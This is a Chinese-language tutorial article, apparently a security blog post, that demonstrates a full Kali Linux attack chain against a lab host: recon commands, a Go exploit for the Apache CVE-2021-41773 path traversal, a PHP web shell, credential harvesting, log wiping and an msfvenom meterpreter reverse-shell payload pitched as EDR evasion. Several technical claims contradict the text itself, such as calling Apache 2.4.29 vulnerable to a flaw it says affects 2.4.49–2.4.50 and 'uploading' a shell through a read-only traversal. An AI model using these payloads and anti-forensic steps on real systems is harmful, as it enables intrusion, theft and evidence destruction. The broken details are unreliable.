一、从架构看Kali Linux的渗透测试潜力
Kali Linux是专为渗透测试和数字取证而设计的Linux发行版,它预装了数百种安全工具,涵盖了信息收集、漏洞分析、Web应用测试、无线网络攻击等多个领域。它的轻量化和高可定制性使得它成为红队和安全研究人员的首选工具。
Kali的架构设计旨在为攻击者提供灵活的环境。它基于Debian系统,支持安装多种额外工具。通过结合强大的工具链和定制化的C2架构(如Cobalt Strike、Sliver等),Kali提供了一种极具攻击性的渗透平台。
在本篇文章中,我们将从一个真实漏洞案例切入,展示如何使用Kali Linux完成一次完整的渗透测试攻击链:从信息收集到权限提升,再到横向移动与数据窃取。所有实验均基于合法授权的环境,意在展示攻击技术如何被武器化以及如何防御。
---
二、目标锁定:信息收集与攻击面分析
任何一次攻击的起点都是信息收集。攻击者往往会通过主动与被动手段,全面了解目标的攻击面。这里我们以模拟公司内部的某台Web服务器为目标,展示如何用Kali Linux进行高效的信息收集。
实战案例背景
假设目标是一个未知的Web服务器,攻击者的目标是:
- 收集子域、开放端口、服务版本等初始情报;
- 确定是否有已知漏洞;
- 制定针对性的利用方案。
目标地址:http://victim.local
使用工具集
我们将使用以下工具进行信息收集:
- Nmap - 用于端口扫描与服务版本探测;
- Gobuster - 用于目录和文件枚举;
- WhatWeb - 确定Web技术栈;
- Subfinder - 查找子域;
- Nikto - 漏洞扫描。
攻击步骤
1. 端口扫描与服务识别
我们使用Nmap扫描目标的端口,获取开放的服务列表:
<pre><code class="language-shell">nmap -sC -sV -p- -T4 http://victim.local</code></pre>
-sC:启用默认脚本扫描;-sV:探测服务版本;-p-:扫描所有端口;-T4:设置扫描速度为较快。
扫描结果如下:
<pre><code>PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 3306/tcp open mysql MySQL 5.7.34</code></pre>
从结果中可以看到,目标暴露了SSH、HTTP和MySQL服务,其中MySQL可能会成为后续攻击的切入点。
2. 枚举隐藏目录与文件
针对80端口的Web服务,我们使用Gobuster枚举网站的隐藏目录:
<pre><code class="language-shell">gobuster dir -u http://victim.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</code></pre>
输出结果:
<pre><code>/admin /backup /uploads</code></pre>
这些目录可能包含敏感信息,例如备份文件或未授权的管理页面。
3. Web技术栈分析
使用WhatWeb快速识别目标Web站点的技术栈:
<pre><code class="language-shell">whatweb http://victim.local</code></pre>
输出结果:
<pre><code>[+] http://victim.local | Apache[2.4.29] | PHP[7.2.24]</code></pre>
我们得知目标使用了较旧版本的Apache和PHP,这可能存在已知的RCE或LFI漏洞。
4. 自动化漏洞扫描
使用Nikto扫描Web服务,发现潜在漏洞:
<pre><code class="language-shell">nikto -h http://victim.local</code></pre>
结果显示:
<pre><code>+ The X-Frame-Options header is not present.
- Apache/2.4.29 is vulnerable to CVE-2021-41773 (Path Traversal).</code></pre>
结合以上信息,我们可以将攻击目标聚焦到CVE-2021-41773漏洞。
---
三、武器化漏洞:CVE-2021-41773路径遍历
漏洞原理
CVE-2021-41773是Apache 2.4.49及2.4.50版本中的路径遍历漏洞。由于不当的URL路径解析,攻击者可以通过构造恶意URL访问任意文件,甚至执行命令。
POC代码实现
以下是一个Go语言实现的漏洞利用脚本,它能够从目标服务器下载任意文件:
<pre><code class="language-go">package main
import ( "fmt" "net/http" "io/ioutil" "os" )
func main() { if len(os.Args) != 3 { fmt.Println("Usage: go run exploit.go <target_url> <file_path>") return }
target := os.Args[1] filePath := os.Args[2]
// 构造恶意URL url := fmt.Sprintf("%s/cgi-bin/.%2e/.%2e/.%2e/.%2e/%s", target, filePath)
resp, err := http.Get(url) if err != nil { fmt.Println("Error:", err) return } defer resp.Body.Close()
// 打印文件内容 body, _ := ioutil.ReadAll(resp.Body) fmt.Println(string(body)) }</code></pre>
运行脚本:
<pre><code class="language-bash">go run exploit.go http://victim.local /etc/passwd</code></pre>
如果成功,攻击者将能够读取目标服务器的/etc/passwd文件,进一步确认攻击环境。
---
四、从初始突破到横向移动
凭借路径遍历漏洞的初始突破,我们可以进一步提权,甚至横向移动以控制更多主机。
提权思路
- 查找Web服务进程的运行用户;
- 上传后门,获取反向Shell;
- 使用
sudo或SUID文件尝试提权。
利用路径遍历漏洞,我们上传一个反向Shell脚本到目标的/uploads目录:
<pre><code class="language-bash">echo "<?php system(\$_GET['cmd']); ?>" > shell.php curl -X POST -F "[email protected]" http://victim.local/uploads/</code></pre>
访问后门:
<pre><code class="language-bash">curl http://victim.local/uploads/shell.php?cmd=id</code></pre>
结果:
<pre><code>uid=33(www-data) gid=33(www-data) groups=33(www-data)</code></pre>
我们成功获取了目标Web服务器的权限。
横向移动
通过枚举目标服务器上的MySQL配置文件(如/etc/mysql/my.cnf),我们可能发现MySQL凭据:
<pre><code>user=root password=examplepassword</code></pre>
使用MySQL账号进一步登录或提权,甚至通过SSH访问其他内网主机。
---
五、痕迹清除与对抗防御系统
清除日志
攻击者在Kali终端可直接编辑Apache日志文件清除痕迹:
<pre><code class="language-bash">echo "" > /var/log/apache2/access.log echo "" > /var/log/apache2/error.log</code></pre>
EDR绕过
使用内存加载技术(如msfvenom生成无文件Payload)避免被EDR检测:
<pre><code class="language-bash">msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<KaliIP> LPORT=4444 -f elf > payload.elf chmod +x payload.elf ./payload.elf</code></pre>
---
六、经验总结
通过本次Kali Linux的渗透测试演示,我们可以看到一个完整的攻击链从信息收集到漏洞利用带来的安全威胁。同时,从攻击者的角度出发,也总结了如何绕过常见防护系统。
攻防的本质是对抗与较量。无论是作为红队还是蓝队,都需要不断学习最新的技术,才能立于不败之地。